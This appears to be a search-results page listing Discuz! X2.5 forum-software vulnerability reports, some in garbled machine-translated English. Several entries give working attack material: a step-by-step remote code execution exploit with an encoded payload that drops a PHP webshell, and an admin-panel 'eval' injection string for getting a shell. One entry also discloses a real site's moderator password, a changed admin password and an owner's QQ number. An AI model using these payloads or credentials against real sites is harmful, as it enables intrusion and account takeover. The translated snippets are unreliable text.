16 matches found
Discuz X2.5 /uc_server/control/admin/db.php 路径泄露漏洞
No description provided by source...
Discuz! --X2/X2.5管理权限用户修改创始人用户密码漏洞
简要描述: 0.0 详细说明: Discuz! --X2/X2.5低权限用户修改搞权限用户密码漏洞 涉及 Discuz! X2/X2.5 X3未做测试。 (涉及网站 http://bbs.xiangyang.net 副站长:风的方向 密码:zhoujx626 ) (网站管理员:admin 密码不知道 修改后密码:zlf123456 站长QQ:71629730) 留下以上信息 方面查证。 今天工作关系 友情检测一个网站 拿到一个用户 用户名:风的方向 用户组:管理组 用户职务:副站长 如图: 想拿shell 但是没有UC设置权限 怎么办? 刚开始是准备找地方写XSS盗取 admin 用户名...
dz3. 0/2. 5 Background to get shell-vulnerability warning-the black bar safety net
To work seen after the tick community has released a discuz x3 the background to get the shell method, then t00ls members also tested discuz x2. 5 the background to get the shell method. A good ass is I tested didn't, caught the packet and the given case is not the same now! After the study found...
XSS: discuz X2. 5 cross-site vulnerabilities using the method of analysis-vulnerability warning-the black bar safety net
0×0 1 cannot get the COOKIE Log analysis Say DISCUZ X2. 5, hereinafter referred to as DZ25 the COOKIES got there is no way to login, but why? Today a simple look, we log a DZ25 of the station, landing after a look at the COOKIE ! On the inside we turned down, you will find a HTTPONLY fields, or...
Discuz! X2.5 api.php 路径泄露
No description provided by source...
Discuz!x2.5某处存储xss
简要描述: Discuz!x2.5某处存储xss 比较鸡肋 详细说明: 在论坛首页管理 禁止用户那 输入你能管理的用户名称 然后选择禁言 理由那插 漏洞证明:...
discuz X2. 5 latest vulnerability,a neglected physical path of the leak-vulnerability warning-the black bar safety net
Before everyone's attention that both the physical path of the leak: Before the two physical path of the leak address: http://www.myhack58.com/ucserver/control/admin/db.php http://www.myhack58.com/source/plugin/myrepeats/table/tablemyrepeats.php Actually install here also hide one, some people...
Discuz! X2. 5 the latest version of the background administrator permissions Getshell details of the disclosure-vulnerability warning-the black bar safety net
In the background - webmaster - Ucenter settings set at UcenterIP for XX\';eval$POSTa?;// XX ! 2. The discovery Management page code out. ! 3. Serving knife! ! 4. Look at the source code, Oh, the original is so! !...
Discuz X2. 5 the latest version of the proof of the path-vulnerability warning-the black bar safety net
! Vulnerability to prove: http://www.erdare.com/source/plugin/myrepeats/table/tablemyrepeats.php Solution: add! defined'INUC' && exit'Access Denied';...
Discuz X2.5最新版爆路径
简要描述: Discuz X2.5最新版爆路径 详细说明: 漏洞证明: http://www.erdare.com/source/plugin/myrepeats/table/tablemyrepeats.php...
Discuz! X2.5最新版本 日志功能存在XSS漏洞
简要描述: Discuz! X2.5最新版本 日志功能存在XSS漏洞 详细说明: Discuz! X2.5最新版本 日志功能存在XSS漏洞 日志发表没有过滤代码 漏洞证明: 从Discuz全新下载的X2.5安装包 进行全新安装 发表一篇日志 写入XSS代码 日志源码编辑 没有进行XSS代码过滤...
Discuz X2.5 时区逻辑错误
简要描述: Discuz X2.5 时区逻辑错误,导致Discuz某些应用不能正常使用 详细说明: Discuz X2.5 时区逻辑错误,导致Discuz某些应用不能正常使用 比如QQ登陆 漏洞证明:...
Discuz! X2. 5 latest GetShell0day detailed use-vulnerability warning-the black bar safety net
I heard that Discuz! This time and out of vulnerability, this was a GetShell vulnerabilities. This exploit is relatively new, it should be a lot of stations haven't updated it. Affects versions: 2 0 1 2 0 4 0 7, beta, rc Discuz! X2. 5 Release 2 0 1 2 0 4 0 7 edition in pregreplace using the e...
Discuz!的改名卡道具可以改系统禁止的用户名
简要描述: 【飞易】改名卡漏洞 2.0版本 该漏洞可以更改系统禁止的用户名. 详细说明: 在后台设置了禁止注册的用户名. 但是用改名卡道具就可以修改成任意用户名.长名字没测试过 漏洞证明: 可以自己测试下...我这里就不放出了 Discuz!X2.5的道具. 道具地址http://addon.discuz.com/[email protected]...
Discuz! X2. 5 remote code execution vulnerabilities and EXP 0day-vulnerability warning-the black bar safety net
DZ x2. 5 code execution 0day 1. Register any account 2. Login, post a blog log that is log //click the middle of the registration the user name you saw 3. Add a picture, select the network picture, address$fputsfopenbase64decodeZGVtby5waHA,w,base64decodePD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgpz5vaw //us...
Discuz! X2.5 远程代码执行漏洞
No description provided by source. 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址$fputsfopenbase64decodeZGVtby5waHA,w,base64decodePD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw 4.访问日志,论坛根目录下生成demo.php,一句话密码C...